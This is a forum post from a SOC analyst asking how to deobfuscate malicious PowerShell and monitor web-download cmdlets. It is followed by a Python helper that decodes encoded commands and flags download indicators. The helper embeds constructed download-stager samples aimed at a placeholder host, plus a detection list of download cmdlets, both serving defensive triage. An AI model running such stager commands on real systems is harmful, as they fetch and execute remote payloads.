Hi guys,
As part of my SOC Analyst role I often come across malicious PS scripts.
I often have to try to deobfuscate them before I can try to work out what they're doing, which is one of the questions I want to ask.
Once I have deobfuscated them enough to get a feel for what they're doing, they almost always create a new browsing object to download a malicious payload.
So I have a couple of questions I'd like to pose to the group:
1. Is there any easy way to get scripts deobfuscated?
The machine obviously needs to deobfuscate them to know which cmdlets to invoke with which parameters etc.
2. Is there any way to "disable" or monitor specific cmdlets?
Particularly the ones that create new web objects?
Thanks in advance.
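A small triage helper for the two questions above, added here as an illustration and not part of the original post: it decodes the `-EncodedCommand` (Base64, UTF-16LE) layer, strips two common string-splitting tricks, and then flags the objects and cmdlets used to fetch remote content. It can be run over a pasted script or over the text of a PowerShell Script Block Logging event (Event ID 4104), which already exposes the decoded blocks. The two samples and the host name are constructed placeholders.

```python
import base64
import re

# Constructed samples (placeholder host, not real indicators): an -EncodedCommand
# launcher and a string-concatenation/backtick-split variant of the same stager.
_INNER = "(New-Object Net.WebClient).DownloadString('http://host.invalid/a')"
SAMPLE_ENCODED = ("powershell -nop -w hidden -EncodedCommand "
                  + base64.b64encode(_INNER.encode("utf-16-le")).decode())
SAMPLE_SPLIT = ("(New-Object ('Net.'+'WebCli'+'ent')).('D`ownload'+'Str`ing')"
                "('http://host.invalid/b')")

# Cmdlets, types and methods that fetch remote content; matched case-insensitively.
WEB_INDICATORS = [
    r"Net\.WebClient", r"DownloadString", r"DownloadFile", r"DownloadData",
    r"Invoke-WebRequest", r"\biwr\b", r"Invoke-RestMethod", r"\birm\b",
    r"Start-BitsTransfer", r"Net\.Http\.HttpClient",
]

def decode_encoded_command(text):
    """Replace any -EncodedCommand/-enc/-e <Base64> argument with its UTF-16LE plaintext."""
    pat = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{8,})", re.I)
    def _sub(m):
        try:
            return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)           # not valid Base64/UTF-16: leave it untouched
    return pat.sub(_sub, text)

def normalize(text):
    """Strip two common obfuscation layers: backtick token splitting and 'a'+'b' joins."""
    text = re.sub(r"`(?![0abefnrtv])", "", text)   # keep genuine escapes such as `n
    join = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    while join.search(text):
        text = join.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
    return text

def find_web_indicators(text):
    """Decode and normalize a script (or a 4104 script-block log entry), then return
    the distinct web-download indicators that appear in it."""
    cleaned = normalize(decode_encoded_command(text))
    hits = {m.group(0) for p in WEB_INDICATORS for m in re.finditer(p, cleaned, re.I)}
    return sorted(hits)

if __name__ == "__main__":
    for sample in (SAMPLE_ENCODED, SAMPLE_SPLIT):
        print(find_web_indicators(sample))
```

Both samples resolve to the same two indicators once the layers are removed; anything this helper cannot unwrap (runtime string building, compression, invoked code) is left as-is, so a sandbox run with script block logging remains the reliable way to see the final command.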